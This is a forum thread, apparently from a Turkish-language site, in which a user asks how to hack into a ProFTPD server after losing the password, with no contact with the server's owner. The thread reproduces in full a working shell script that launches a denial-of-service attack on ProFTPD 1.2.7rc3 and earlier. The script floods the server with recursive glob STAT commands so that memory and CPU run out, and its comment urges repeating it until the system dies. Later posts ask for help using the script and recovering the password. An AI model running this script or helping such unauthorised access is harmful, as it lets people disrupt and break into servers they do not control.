ProFTPD

prince13

New member
Katılım
3 Eyl 2005
Mesajlar
7
Reaction score
0
Puanları
0
Is there a way that we can hack into ProFTPD ftp client ayn hack or some exploit.

please help i hav lost my password for my ftp server and i don't hav any contact with the server owner so i wanna hack into it inorder to get my importtant files down wich i need very urgently.

please help thanks
 
Add me

thanks for ur reply!! Please add me to ur msn [email protected]

Hello,

proftpd is vulnerable to denial of service similar to the list
*/../*/../*/../*.

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach - www.duho.org
#
# use: ./prodos.sh <host> <user> <pass>
# do this some more to make sure the system eventually dies

cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!

#end

i found this but i don't know how to use those codes please help me
 
Phara0h Zaten yardimci oLmush =] bize de Thanx demek duser =)
 
please help me anyone here can u please recover my pass for me
 
Geri
Üst